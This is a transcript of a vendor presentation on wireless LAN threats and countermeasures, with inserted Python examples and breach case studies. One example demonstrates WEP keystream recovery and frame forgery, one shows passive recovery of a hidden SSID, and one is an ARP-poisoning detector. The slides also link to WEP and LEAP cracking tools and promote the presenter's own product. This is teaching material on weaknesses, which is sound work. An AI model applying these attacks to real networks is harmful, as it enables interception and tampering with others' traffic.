Wireless LAN Security Threats - PowerPoint PPT Presentation

Slides: 36
Provided by: IMA

Transcript and Presenter's Notes

1
Wireless LAN Security: Threats & Countermeasures
Presented By Joseph Tomasone, Senior Network Security Engineer, Fortress Technologies, Inc.
2
Overview
  • Wireless Networking 101
  • Security Threats
  • Security Solutions
  • Legal Aspects
  • Case Studies

3
Why use Wireless Networks?
  • Mobility/Convenience
  • Extend physical network beyond wired boundaries
  • Precludes expensive wiring
  • Free bandwidth!
4
Who uses wireless networks?
  • Business & Industry (WLAN or W-Bridge)
  • Consumer (Home WLAN)
  • Universities (Campus WLAN or W-Bridge)
  • Wireless ISPs (Wireless ISP Access)
  • Public Hotspots (Starbucks, Airports, Hotels, etc.)
  • Military & Civil Agencies (WLAN, W-Bridge)
5
Fact: 802.11a and 802.11g both run at 54 Mbps, but 802.11g has greater range because its lower operating frequency (2.4 GHz rather than 5 GHz) propagates further and through obstacles better.
  • Wireless Networking 101
  • Alphabet Soup
  • 802.11b: 2.4 GHz, 11 Mbps
  • 802.11a: 5 GHz, 54 Mbps
  • 802.11g: 2.4 GHz, 54 Mbps
  • 802.11i: Security amendment for 802.11a/b/g

6
Wireless Networking 101: The Missing Letters
  • 802.11 (original): 2.4 GHz, 1/2 Mbps, FHSS or DSSS
  • 802.11c: Bridge Operation Procedures
  • 802.11d: Spec for international operation
  • 802.11e: QoS (draft)
  • 802.11f: Inter-Access Point Protocol (IAPP)
  • 802.11h: 5 GHz operation in Europe
  • 802.11j: 4.9 GHz-5 GHz Operation in Japan (draft)
7
THREATS: "Attack him where he is unprepared, appear when you are not expected." - Sun Tzu, The Art of War
8
Fact: NetStumbler is only the best known of several freeware tools on the Internet used to discover WLANs.
  • THREAT: War Driving (also Stumbling or War Walking) is the practice of driving/walking through an area while using tools to discover wireless networks, for possible attack or merely for sport.

9
Fact: NetStumbler currently does not find APs with SSID broadcasting disabled; it sends broadcast probe requests, which a "closed" AP ignores. Kismet does find them, because it listens passively and still sees the AP's beacons (with a blank SSID) and the client frames that carry the real name.
  • Some War Driving Tools
  • NetStumbler (Windows) www.netstumbler.com
  • MiniStumbler (CE/PocketPC) www.netstumbler.com
  • Kismet (Linux/Unix) www.kismetwireless.net
  • Wellenreiter (Linux/Unix) www.remote-exploit.org
  • URL of interest: http://www.netstumbler.com, be sure to check out the forums area.

10
Fact: Wireless sniffing is passive in nature (a receiver transmits nothing) and is therefore undetectable by the network being monitored.
  • Threats
  • Wired Network Compromise
  • Wireless Network Compromise
  • Wired Network Abuse (Third Party)
  • Theft of Service (WISP)
  • Interception of Traffic (Wireless Sniffing)
  • Hotspot Hijinks

11
COUNTERMEASURES: "You can be sure of succeeding in your attacks if you only attack places which are weakly defended. You can ensure the safety of your defense if you only hold positions that cannot be attacked." - Sun Tzu, The Art of War
12
WLAN Security Survival Checklist
  • (Or, how to not get voted off the Island)
  • Strong Encryption at Layer 2
  • Authentication above and beyond the usual
  • Access Control that lets you sleep at night
  • Security that covers all of your WLAN devices
  • Keep in mind: wireless is a unique security environment with unique security requirements.

13
When is Encryption Weak?
  • When the encryption is not appropriate to the task at hand and divulges information it shouldn't
  • When the encryption protocol has already demonstrated vulnerabilities
  • When the encryption algorithm has weak properties
  • When the key exchange methodology is weak or too cumbersome to implement properly
  • When it's not active all the time and/or must be started by the end user

14
When is Authentication Weak?
  • When the username or password is sent unencrypted or merely hashed
  • When the authentication cannot prevent password guessing attacks
  • When single-factor authentication is employed
  • When users can compromise the network by disclosing credentials

15
When is Access Control Weak?
  • When access is granted based solely on
    authentication
  • When access cannot be revoked immediately

16
Fact: 128-bit WEP is not officially part of the standard (802.11 specifies a 40-bit key plus a 24-bit IV), and some manufacturers' key entry methods are incompatible.
  • COUNTERMEASURES
  • Wired Equivalent Privacy (WEP)
  • (Or, A New Look at an Old Friend)
  • IEEE security for 802.11, built in!
  • Problem: Uses RC4 with the 24-bit IV prepended to the key; certain "weak" IVs leak key bytes (the FMS attack)
  • Problem: Only ONE static key, never changed, so the 16 million IVs run out on a busy network and keystreams repeat
  • Problem: No real authentication (the optional shared-key handshake only leaks keystream to an eavesdropper)
  • Problem: Access control based on a shared credential that is difficult to invalidate
  • Problem: Protocol has several known vulnerabilities (keystream reuse, bit-flipping against the linear CRC-32 ICV)
  • Exploit code available
  • AirSnort http://airsnort.shmoo.com
  • But wait! Didn't the manufacturers eliminate weak IVs?
  • Newer tools use statistical attacks that do not depend on the FMS weak IVs:
  • AirCrack http://www.cr0.net:8040/code/network/aircrack
  • WepLab http://weplab.sourceforge.net
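The two protocol-level problems above (one static key behind a 24-bit IV, and a CRC-32 ICV) can be shown without any of the tools listed. The following is an added example, not code from the presentation or from Fortress: it implements RC4 and WEP frame encryption, then recovers the keystream for one IV from a frame with predictable contents and uses it to read a second frame sent under the same IV, and finally flips a plaintext bit in an encrypted frame while patching the ICV so the AP still accepts it. The key, IV and packet contents are constructed for the example.

```python
"""Added example (not from the presentation): why a static WEP key with a
24-bit IV is fatal. Implements RC4 and WEP frame encryption, then shows two
attacks that need no key at all: recovering the keystream for one IV from a
frame whose plaintext is predictable, and flipping plaintext bits while
patching the linear CRC-32 ICV. Key, IV and packet contents are constructed."""
import struct
import zlib


def rc4_keystream(key, n):
    """Standard RC4: key-scheduling, then n bytes of keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP integrity check value: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext, key_id=0):
    """Frame body = IV(3) || key-id byte || RC4(IV||key) XOR (plaintext || ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)  # 40-bit or 104-bit ("128-bit") WEP
    body = plaintext + icv(plaintext)
    return iv + bytes([key_id << 6]) + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key, frame):
    """Receiver side: decrypt and verify the ICV the way an AP would."""
    iv, ct = frame[:3], frame[4:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    pt = body[:-4]
    if body[-4:] != icv(pt):
        raise ValueError("bad ICV")
    return pt


def recover_keystream(frame, known_plaintext):
    """Attacker: a frame with predictable content (ARP, DHCP, known HTTP headers)
    gives ciphertext XOR (plaintext || ICV) = the RC4 keystream for that IV."""
    return frame[:3], xor(frame[4:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame, iv, keystream):
    """Attacker: any later frame that reuses the IV falls to the same keystream;
    with only 2^24 IVs and a key that never changes, reuse is guaranteed."""
    if frame[:3] != iv:
        raise ValueError("different IV, keystream does not apply")
    ct = frame[4:]
    if len(ct) > len(keystream):
        raise ValueError("keystream shorter than frame")
    return xor(ct, keystream)[:-4]


def flip_bits(frame, delta):
    """Attacker: CRC-32 is affine, crc(p ^ d) = crc(p) ^ crc(d) ^ crc(0...0), so a
    chosen XOR difference can be applied to the ciphertext and the encrypted ICV
    patched to match, without knowing the key or the plaintext."""
    n = len(frame) - 4 - 4                      # plaintext length
    delta = delta.ljust(n, b"\x00")[:n]
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(b"\x00" * n)
    patch = delta + struct.pack("<I", icv_delta & 0xFFFFFFFF)
    return frame[:4] + xor(frame[4:], patch)


# Constructed values for the demonstration
KEY = bytes.fromhex("0102030405")               # 40-bit WEP key, never rotated
IV = b"\x00\x00\x01"                            # the IV that gets reused
KNOWN_PLAINTEXT = b"ARP who-has 10.0.0.1 tell 10.0.0.2"   # content an attacker can guess
SECRET_PLAINTEXT = b"POST /pay card=4111111111111111"     # a later frame, same IV
FRAME_KNOWN = wep_encrypt(KEY, IV, KNOWN_PLAINTEXT)
FRAME_SECRET = wep_encrypt(KEY, IV, SECRET_PLAINTEXT)


def attack_demo():
    """Run both attacks; returns (recovered plaintext, plaintext after bit flip)."""
    iv, ks = recover_keystream(FRAME_KNOWN, KNOWN_PLAINTEXT)
    recovered = decrypt_with_keystream(FRAME_SECRET, iv, ks)
    # change the card number's first digit: byte 15 ('4') XOR 0x05 -> '1'
    forged = flip_bits(FRAME_SECRET, b"\x00" * 15 + b"\x05")
    return recovered, wep_decrypt(KEY, forged)   # the AP accepts the forged frame


if __name__ == "__main__":
    print(attack_demo())
```

Neither attack touches the key: the first needs only a second frame under a repeated IV, the second needs only the linearity of CRC-32. Rotating keys (as LEAP and WPA do) removes the first; only a keyed MIC removes the second.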

17
Fact: ESSID-Jack, a freeware tool from the AirJack suite, can expose a hidden SSID in seconds.
  • COUNTERMEASURES
  • Closed Network Access Control
  • (Disabling Broadcast SSID)
  • First introduced by Lucent
  • Blanks the SSID field in the 802.11 Beacon frame
  • Disables response to broadcast ("ANY") Probe Requests
  • No SSID, no association, right?
  • Problem: The SSID is still sent in the clear in every client probe request and (re)association request, so one legitimate client joining reveals it.
  • Problem: Tools can force a client to disassociate and re-associate on demand to expose the SSID.
    (http://sourceforge.net/projects/airjack)
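The NetStumbler-versus-Kismet point from the war-driving slide and the closed-network problem above are the same fact seen from two sides: the AP stops naming the network, but its clients never do. The following is an added example, not code from the presentation or from Kismet: it builds three 802.11 management frames (a beacon from a closed AP with a blank SSID element, then a directed probe request and an association request from a client that names the network) and parses them the way a passive sniffer would. The MAC addresses and the SSID "corp-wlan" are constructed.

```python
"""Added example (not from the presentation): why 'closed network' SSID hiding
fails against a passive sniffer. Builds three 802.11 management frames (a beacon
from a closed AP whose SSID element is blank, then a directed probe request and
an association request in which the client names the network) and parses them
the way a passive tool such as Kismet would. MAC addresses and SSID are constructed."""
import struct

# Management subtypes; frame-control byte 0 = subtype << 4 | type << 2 | version
ASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0x0, 0x4, 0x5, 0x8
SUBTYPE_NAME = {ASSOC_REQ: "association request", PROBE_REQ: "probe request",
                PROBE_RESP: "probe response", BEACON: "beacon"}
# Fixed fields before the tagged elements: beacon/probe response carry
# timestamp(8)+interval(2)+capability(2); association request carries
# capability(2)+listen interval(2); probe request has none.
FIXED_LEN = {BEACON: 12, PROBE_RESP: 12, PROBE_REQ: 0, ASSOC_REQ: 4}
SSID_ELEMENT_ID = 0
HDR_LEN = 24    # frame control(2) duration(2) addr1(6) addr2(6) addr3(6) seq ctl(2)

AP_MAC = bytes.fromhex("001122334455")       # constructed BSSID
CLIENT_MAC = bytes.fromhex("66778899aabb")   # constructed station
BROADCAST = b"\xff" * 6


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt(subtype, src, dst, bssid, ssid, seq=0):
    """Minimal management frame: header, zeroed fixed fields, one SSID element."""
    fc = bytes([subtype << 4, 0x00])         # type 0 = management, no flags
    hdr = fc + b"\x00\x00" + dst + src + bssid + struct.pack("<H", seq << 4)
    body = b"\x00" * FIXED_LEN[subtype] + bytes([SSID_ELEMENT_ID, len(ssid)]) + ssid
    return hdr + body


def parse_mgmt(frame):
    """Return (subtype, bssid, ssid) or None for non-management/unknown frames.
    ssid is b'' when the element is present but blank (closed network),
    None when no SSID element was found."""
    if len(frame) < HDR_LEN:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:                # not a management frame
        return None
    subtype = fc0 >> 4
    if subtype not in FIXED_LEN:
        return None
    bssid = frame[16:22]
    body = frame[HDR_LEN + FIXED_LEN[subtype]:]
    ssid, i = None, 0
    while i + 2 <= len(body):                # walk the tagged elements
        eid, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:              # truncated element: stop, don't trust it
            break
        if eid == SSID_ELEMENT_ID:
            ssid = value
        i += 2 + length
    return subtype, bssid, ssid


def passive_ssid_map(frames):
    """Kismet-style passive discovery: record BSSIDs whose beacons carry a blank
    SSID, then learn the name from the first client frame that states it."""
    seen = {}
    for frame in frames:
        parsed = parse_mgmt(frame)
        if parsed is None:
            continue
        subtype, bssid, ssid = parsed
        entry = seen.setdefault(mac_str(bssid), {"hidden": False, "ssid": None, "source": None})
        if subtype == BEACON and ssid == b"":
            entry["hidden"] = True
        elif ssid and entry["ssid"] is None:
            entry["ssid"] = ssid.decode("utf-8", "replace")
            entry["source"] = SUBTYPE_NAME[subtype]
    return seen


CAPTURE = [  # constructed capture, in on-air order
    build_mgmt(BEACON, AP_MAC, BROADCAST, AP_MAC, b"", seq=1),
    build_mgmt(PROBE_REQ, CLIENT_MAC, AP_MAC, AP_MAC, b"corp-wlan", seq=7),
    build_mgmt(ASSOC_REQ, CLIENT_MAC, AP_MAC, AP_MAC, b"corp-wlan", seq=8),
]

if __name__ == "__main__":
    for bssid, info in passive_ssid_map(CAPTURE).items():
        print(bssid, info)
```

An active scanner that only reads probe responses to its own broadcast probe sees nothing from this AP; a passive listener learns the BSSID from the blank beacon and the name from the first client that joins. ESSID-Jack simply speeds that up by deauthenticating a client so it re-associates immediately.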

18
Fact: Studies in major cities consistently show that on average, less than 50% of WLANs have any security at all.
  • COUNTERMEASURES
  • MAC Address Filtering
  • Enter authorized MACs in (each!) AP
  • Don't have a valid MAC, you can't get in, right?
  • Problem: MACs are sent in the clear in every frame, so they are easily sniffed, and all wireless NIC drivers currently allow you to specify the MAC you wish to use.
  • Never has so much been done by so many for so long for so little result

19
Fact: Prominent companies that have experienced WLAN security breaches include Best Buy and Lowe's.
  • COUNTERMEASURES
  • LEAP (Cisco)
  • Username/Password required for access
  • Per-session WEP keys rotate, so AirSnort's weak-IV collection is useless
  • Problem: Use of MS-CHAPv2 exposes credentials to a devastating and efficient offline dictionary attack: the challenge and response cross the air in the clear, and the response's structure lets the last two bytes of the NT hash be recovered almost instantly, so only dictionary words whose hash ends in those bytes need to be tested
  • http://asleap.sourceforge.net

20
Fact: Despite being a standard, IPSec suffers from interoperability issues due to differing vendor implementations.
  • COUNTERMEASURES
  • IPSec Overlay
  • Plan B after WEP was cracked: run a VPN tunnel from each client across the untrusted WLAN.
  • Problems
  • 1. Broadcast/multicast frames (ARP, DHCP) are outside the tunnel and travel unencrypted
  • 2. ARP poisoning DoS attack: any station on the WLAN can answer ARP for the gateway and black-hole every tunnel
  • 3. WLAN must be its own subnet, segregated behind the VPN concentrator
  • 4. Client is protected only after it has authenticated and brought the tunnel up
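Problems 1 and 2 above are the same weakness: ARP never enters the tunnel, so a station on the WLAN can re-point the gateway's IP at its own MAC and every IPsec client loses its path to the concentrator. The following is an added example, not code from the presentation or from Fortress: it parses Ethernet/ARP frames and flags any reply or request in which a trusted IP (gateway, concentrator) is claimed by an unexpected MAC, marking replies nobody asked for as the classic poisoning signature. Addresses and the captured frames are constructed.

```python
"""Added example (not from the presentation): ARP is outside an IPsec overlay,
so a station on the WLAN can poison the gateway mapping and black-hole every
tunnel. This is the detection side: parse Ethernet/ARP frames and flag any
reply or request in which a trusted IP is claimed by an unexpected MAC.
Addresses and frames are constructed."""
import struct

ARP_ETHERTYPE = b"\x08\x06"
OP_REQUEST, OP_REPLY = 1, 2
ETH_BROADCAST = b"\xff" * 6


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp(op, sha, spa, tha, tpa):
    """Ethernet header + 28-byte ARP payload (htype 1, ptype IPv4).
    Requests go to the Ethernet broadcast address, replies to the asker."""
    eth_dst = tha if op == OP_REPLY else ETH_BROADCAST
    eth = eth_dst + sha + ARP_ETHERTYPE
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + sha + ip_bytes(spa) + tha + ip_bytes(tpa)
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip) or None."""
    if len(frame) < 42 or frame[12:14] != ARP_ETHERTYPE:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return (op, mac_str(frame[22:28]), ip_str(frame[28:32]),
            mac_str(frame[32:38]), ip_str(frame[38:42]))


def detect_arp_poisoning(frames, trusted):
    """trusted: {ip: mac} for hosts whose mapping must not move (gateway, VPN
    concentrator). Any ARP whose sender claims one of those IPs from another MAC
    is an alert; a reply that no station requested is the classic poisoning sign."""
    alerts = []
    pending = set()      # IPs that some station actually asked about
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, sha, spa, tha, tpa = parsed
        if op == OP_REQUEST:
            pending.add(tpa)
        if spa in trusted and sha != trusted[spa]:
            unsolicited = op == OP_REPLY and spa not in pending
            kind = ("unsolicited " if unsolicited else "") + ("reply" if op == OP_REPLY else "request")
            alerts.append(f"{kind}: {spa} claimed by {sha}, expected {trusted[spa]}")
        if op == OP_REPLY:
            pending.discard(spa)
    return alerts


# Constructed addresses
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", bytes.fromhex("00aabbccdd01")
VICTIM_IP, VICTIM_MAC = "10.0.0.20", bytes.fromhex("00aabbccdd20")
ATTACKER_MAC = bytes.fromhex("00deadbeef00")
TRUSTED = {GATEWAY_IP: mac_str(GATEWAY_MAC)}

CAPTURE = [  # constructed WLAN capture, in order
    build_arp(OP_REQUEST, VICTIM_MAC, VICTIM_IP, b"\x00" * 6, GATEWAY_IP),  # who has 10.0.0.1?
    build_arp(OP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # legitimate answer
    build_arp(OP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),  # poison: nobody asked
]

if __name__ == "__main__":
    for alert in detect_arp_poisoning(CAPTURE, TRUSTED):
        print(alert)
```

The detector has to live on the WLAN segment itself (a monitor port on the AP or a wireless IDS), because by the time traffic reaches the concentrator the ARP exchange is already over. Static ARP entries on the clients, or moving encryption down to layer 2, remove the problem rather than just alarming on it.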

21
WLAN Traffic Unprotected
22
WLAN Traffic IPSec
23
WLAN Traffic Fortress
24
Fact: WPA (TKIP) has a built-in countermeasure against forged frames: two Michael MIC failures within 60 seconds shut down all TKIP traffic on the AP for 60 seconds, which an attacker can trigger deliberately as a denial of service.
  • COUNTERMEASURES
  • 802.1X / WPA / 802.11i
  • Current IEEE standards for WLAN security.
  • Problems!
  • Single-factor authentication (with few exceptions)
  • Access control based solely on authentication
  • Reliance on 802.1X and multiple EAP types offers questionable security and vendor incompatibilities (protocol, not product)
  • Backwards security architecture (authenticate over the air first, encrypt afterwards) leads to password guessing attacks
  • Security policy pre-defined for you!
  • Multiple device security audit

25
Fact: The AirFortress is used in the largest known WLAN security deployment: 11,000 APs, 85,000 users (U.S. Army).
  • COUNTERMEASURES
  • Fortress
  • Layer 2 encryption with DES/3DES/AES
    (128/192/256)
  • Supports all layer 3 protocols, roaming, etc.
  • Three Factor Authentication (network, device,
    user)
  • Clients for Win32/WinCE/PocketPC/PalmOS/DOS/Linux
  • Compression for data security and performance
  • FIPS, SPOCK, i-TRM, TISCOM certified

26
Fact: There is no known Federal case law on point that prohibits wireless sniffing. Some State laws are broad enough to include it.
  • Legal Aspects
  • Regulations: HIPAA, SOX, GLBA, FIPS
  • Sniffing: Legal? Illegal? Moot point.
  • Network Intrusion: intent questions (Windows XP auto-connecting to any available network, Freenets)
  • System Intrusion: Covered by statutes, but to what end?

27
Fact: Wireless security issues have forced the shutdown of WLANs in military, civil, and commercial entities.
  • Legal Aspects
  • Probable Cause: Any laptop/PDA with a wireless card?
  • Warrant & Arrest
  • Location, location, location
  • The time factor

28
Fact: Stefan Puffer is the first known individual to be charged with a computer intrusion through a WLAN.
  • Case Studies: Stefan Puffer
  • Worked for Harris County, TX as a security consultant in 1999
  • In 2002, notified Harris County officials that an insecure WLAN was operating at the County Court and demonstrated same to the County Central Technology chief and a Houston Chronicle reporter

29
Fact: Puffer faced a total of 10 years in jail and a $500,000 fine for his actions.
  • Case Studies: Stefan Puffer
  • District Clerk files complaint alleging $5,000 in damages (forensic costs); Puffer is arrested in a 6 a.m. forced-entry warrant execution by the FBI
  • Charged with two counts: "unauthorized access into a protected computer system" and "unauthorized access of a computer system used in justice administration"

30
Fact: The District Clerk and the County Central Technology head later blamed each other for provoking the incident.
  • Case Studies: Stefan Puffer
  • District Clerk admits no confidential information was disclosed, but required the WLAN to be shut down
  • Puffer acquitted by jury in a near-record 15 minutes

31
Fact: Inventory Management is considered to be the most prevalent wireless application at present.
  • Case Studies: Best Buy & Home Depot
  • April, 2002: Message posted on an Internet forum describing how a hacker monitored his own credit card number being transmitted as he purchased an item at Best Buy
  • May, 2002: Best Buy shuts down wireless cash registers at all stores

32
Fact: Retailers have been using wireless LANs in varying forms for well over 10 years.
  • Case Studies: Best Buy & Home Depot
  • May, 2002: Home Depot shuts down WLANs that appear to be leaking SQL queries. They are later reactivated with WEP.
  • June, 2002: Best Buy reactivates wireless cash registers with unspecified security measures, presumably WEP.

33
Fact: A Lowe's store in CA was shut down for one day due to a crash of its POS system caused by the Southfield hackers.
  • Case Study: Lowe's
  • Oct/Nov 2003: Three men arrested for penetrating Lowe's corporate network from the parking lot of the Southfield, MI Lowe's store
  • Charged with causing damage to a protected computer system - maximum penalty 10 years in prison, $250,000 fine

34
Fact: Lowe's issued a statement essentially saying that their strong security did not fail them - they detected the intrusions.
  • Case Study: Lowe's
  • Gained access to Lowe's stores in Salina, Kan.; Wilkesboro, N.C.; Long Beach and Visalia, Calif.; Louisville, Ky.; Rapid City, S.D.; and Gainesville, FL.
  • Tried to install sniffer software to log credit card numbers; did so, and compromised an unspecified number of cards
  • Guilty pleas and jail time in late 2004

35
Fact: Hackers are favoring home WLANs due to lack of security and monitoring, coupled with fast Internet connections.
  • Case Study: Home WLAN intrusions
  • Man arrested in Toronto while downloading child pornography via an unsecured residential WLAN. Homeowner not indicted.
  • FL homeowner questioned and eventually released concerning an emailed death threat sent via an unsecured residential WLAN.